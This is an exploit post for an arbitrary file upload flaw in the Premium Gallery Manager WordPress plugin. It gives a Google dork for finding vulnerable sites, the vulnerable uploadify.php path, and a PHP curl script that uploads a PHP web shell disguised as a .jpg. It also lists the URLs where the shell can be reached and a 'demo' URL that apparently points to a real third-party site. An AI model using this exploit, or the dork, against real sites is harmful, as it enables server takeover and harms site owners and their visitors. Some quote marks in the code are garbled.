exploit title: WP Plugins Premium Gallery Manager Arbitrary File Upload
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/Premium_Gallery_Manager”

Vulnerable path:

site.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php

Exploit:

< -?- php $uploadfile="Sh1Ne.php.jpg"; $ch= curl_init("http://127.0.0.1:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/Premium_Gallery_Manager/uploadify/’));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$postResult=curl_exec($ch);
curl_close($ch);
print”$postResult”;
? >

ShellAccess:

http://localhost:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost:8080/wp-content/uploads/[years]/[month]/<


Demo:

http://hotelXofn.is/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php